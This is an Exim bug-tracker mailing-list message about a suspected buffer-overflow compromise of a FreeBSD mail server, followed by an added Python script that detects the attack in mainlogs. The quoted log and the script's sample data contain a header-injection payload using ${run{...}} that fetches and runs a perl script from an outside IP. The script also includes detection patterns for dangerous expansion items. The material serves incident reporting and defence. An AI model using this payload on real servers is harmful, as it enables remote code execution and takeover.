[exim-dev] [Bug 1135] possible vulnerability same buffer over…

Author: Adrian P
Date:  
To: exim-dev
Subject: [exim-dev] [Bug 1135] possible vulnerability same buffer overflow exploit
------- You are receiving this mail because: -------
You are on the CC list for the bug.

http://bugs.exim.org/show_bug.cgi?id=1135




--- Comment #8 from Adrian P <adi@???> 2011-08-12 19:38:42 ---
This was / is the default config, which is a modified copy of the
configure.default that comes with Exim.
Exim was installed from ports:
# $FreeBSD: ports/mail/exim/Makefile,v 1.259 2011/05/11 11:30:17 rea Exp $

The machine was just cleaned up afterwards (as in: kill all the exim and
perl processes; the trojan was a perl payload with my @fakeps =
("/usr/sbin/exim4 -bd -q1h"); ).
Exim was rebuilt using the latest version from FreeBSD ports.
Because the system wasn't reinstalled afterwards, I can't be 100% sure it
was clean, but the second time it was the same modus operandi: a perl script
running as mailnull with a fake ps and basically this payload (this was used
on 4.69 and was logged by Exim):


Header0054: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
Header0055: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
HeaderX: ${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;r


tmp/g.x*'}}${run{
*** truncated ***
2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent too soon: pipelining was advertised): rejected "Header0000: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV" H=42.d.5446.static.theplanet.com (yougotpwned.com) [70.84.13.66] next input="Header0001: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\nHeader000"
2011-07-21 06:46:26 SMTP protocol synchronization error (input sent without waiting for greeting): rejected connection from H=[208.57.239.52] input="GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac "   --    // looks like msf running on an iPhone



Just in case, I will leave that machine acting as a honeypot (the OS was
rebuilt yesterday) but with the same version of Exim and config.


On 11-08-12 11:28 AM, Graeme Fowler wrote:
> ------- You are receiving this mail because: -------
> You reported the bug.
>
> http://bugs.exim.org/show_bug.cgi?id=1135
>
>
>
>
> --- Comment #7 from Graeme Fowler <graeme@???> 2011-08-12 16:28:00 ---
> (In reply to comment #6)
>> that was the config at the time
> What was, the default config?
>
> If so - was that the stock default config from the distribution, a default
> config supplied by the FreeBSD ports collection, a packaged default config from
> somewhere else?
>
> Please add it as an attachment to this bug. If it's irrelevant, at least we'll
> have proved that it is but until then it may have some relevance.
>
> I might also add - did you rebuild the machine in the first place after it got
> hacked, or do some sort of "clearup" operation? Are you absolutely sure that it
> got completely secured?
>
>



--
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email
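Added example, not part of the bug report, the quoted log, or Exim itself: a small Python triage script that turns the indicators visible in the mainlog excerpt in comment #8 into checks a practitioner can run over an Exim mainlog. It flags (a) "SMTP protocol synchronization error" entries, (b) runs of a single repeated byte such as the "VVVV..." padding headers, (c) Exim string-expansion items appearing inside client-supplied data, and (d) HTTP requests sent to the SMTP port, then groups the hits by the H= client address. The expansion check goes beyond the ${run{...}} seen in the thread and also matches the perl, readsocket, readfile and dlfunc items; that generalization, the severity scale, and the sample log (constructed in the style of the excerpt, with one invented line showing a logged HeaderX) are this example's assumptions, not something the thread states.

```python
"""Triage an Exim mainlog for the pattern reported in bug 1135: oversized
padding headers, a header carrying Exim string-expansion items such as
${run{...}}, and the SMTP synchronization errors Exim logs when a client
pipelines its payload without waiting for replies.

Added illustration for the bug thread; not Exim code and not the reporter's
script. SAMPLE_LOG is constructed, not copied from the thread verbatim.
"""
import re
from collections import defaultdict

# Exim string-expansion items that run code or touch the system if a header
# is ever expanded. All five are real Exim expansion item names; treating
# their presence in client data as an indicator is this example's assumption.
EXPANSION_RE = re.compile(r"\$\{(run|perl|readsocket|readfile|dlfunc)\b")

# 64 or more repetitions of one byte, e.g. the "VVVV..." padding headers.
PADDING_RE = re.compile(r"(.)\1{63,}")

# Exim's H= field: H=hostname (helo) [ip], H=hostname [ip] or H=[ip].
HOST_RE = re.compile(
    r"H=(?:(?P<host>[^\s\[(]+)\s+)?(?:\((?P<helo>[^)]*)\)\s+)?\[(?P<ip>[0-9.]+)\]"
)
SYNC_ERROR = "SMTP protocol synchronization error"
HTTP_PROBE_RE = re.compile(r'input="(?:GET|POST|HEAD) ')
TIMESTAMP_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)")

PAD = "V" * 80  # stands in for the long runs of V in the quoted log

# Constructed sample in the style of the excerpt quoted in comment #8. The IPs
# and HELO name are the ones visible in the thread; the second line is invented
# to show a ${run{...}} header being logged; the last line is an ordinary
# delivery for contrast.
SAMPLE_LOG = "\n".join([
    '2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent '
    'too soon: pipelining was advertised): rejected "Header0000: ' + PAD + '" '
    'H=42.d.5446.static.theplanet.com (yougotpwned.com) [70.84.13.66] '
    'next input="Header0001: ' + PAD + '\\nHeader000"',
    '2011-07-21 06:15:02 H=[70.84.13.66] rejected "HeaderX: ${run{/bin/sh -c '
    "'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;"
    "rm -f /tmp/g.x*'}}\"",
    '2011-07-21 06:46:26 SMTP protocol synchronization error (input sent '
    'without waiting for greeting): rejected connection from H=[208.57.239.52] '
    'input="GET / HTTP/1.1\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/5.0 (iPhone"',
    '2011-07-21 07:01:10 1QjxYz-0001Ab-Cd <= alice@example.org '
    'H=mail.example.org [192.0.2.10] P=esmtp S=1234',
])


def analyse_line(line):
    """Return a finding dict for a suspicious line, or None for a clean one."""
    indicators = []
    if SYNC_ERROR in line:
        indicators.append("sync_error")
    if PADDING_RE.search(line):
        indicators.append("padding")
    for m in EXPANSION_RE.finditer(line):
        tag = "expansion:" + m.group(1)
        if tag not in indicators:
            indicators.append(tag)
    if HTTP_PROBE_RE.search(line):
        indicators.append("http_probe")
    if not indicators:
        return None
    host = HOST_RE.search(line)
    ts = TIMESTAMP_RE.match(line)
    return {
        "time": ts.group(1) if ts else None,
        "ip": host.group("ip") if host else None,
        "helo": host.group("helo") if host else None,
        "indicators": indicators,
    }


def scan(log_text):
    """All findings for a mainlog given as one string."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


def summarise(findings):
    """Group indicators per client IP and rate them: any expansion item in
    client data is 'high', padding without one is 'medium', else 'low'."""
    by_ip = defaultdict(set)
    for f in findings:
        by_ip[f["ip"]].update(f["indicators"])
    out = {}
    for ip, ind in by_ip.items():
        if any(i.startswith("expansion:") for i in ind):
            sev = "high"
        elif "padding" in ind:
            sev = "medium"
        else:
            sev = "low"
        out[ip] = {"severity": sev, "indicators": sorted(ind)}
    return out


if __name__ == "__main__":
    for ip, info in summarise(scan(SAMPLE_LOG)).items():
        print(ip, info["severity"], ", ".join(info["indicators"]))
```

To use it on a real host, replace SAMPLE_LOG with the contents of the mainlog (for example /var/log/exim/mainlog on the FreeBSD port) and review anything rated "high" by hand: a legitimate client has no reason to send an Exim expansion item in a header, while synchronization errors on their own are common noise from scanners.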